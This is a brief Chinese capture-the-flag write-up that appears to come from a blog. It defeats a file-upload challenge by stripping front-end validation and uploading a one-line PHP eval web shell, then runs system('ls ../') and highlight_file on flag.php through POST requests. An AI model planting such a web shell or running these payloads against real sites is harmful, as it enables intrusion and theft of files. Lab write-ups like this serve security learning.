0x01
查看网页源代码,猜测应该是前端验证,只能上传图片文件。前端验证就很好办,把onchange=check()
删掉就好了
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/9b3f770f9a756c77df9381a540ff21d2.png)
0x02
准备一份一句话木马<?php eval($_POST['shell']);?>
,保存为shell.php,然后上传shell.php,得到返回结果:
然后可以使用菜刀连接,由于我没有装菜刀,于是在浏览器中访问给定的位置,然后通过Hackbar提交POST数据:
shell=system("ls ../");
这个位置是自己试出来的
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/ff8850d2a9df23e0519a190f5b212051.png)
shell=highlight_file("../flag.php");
图二中已经显示了flag。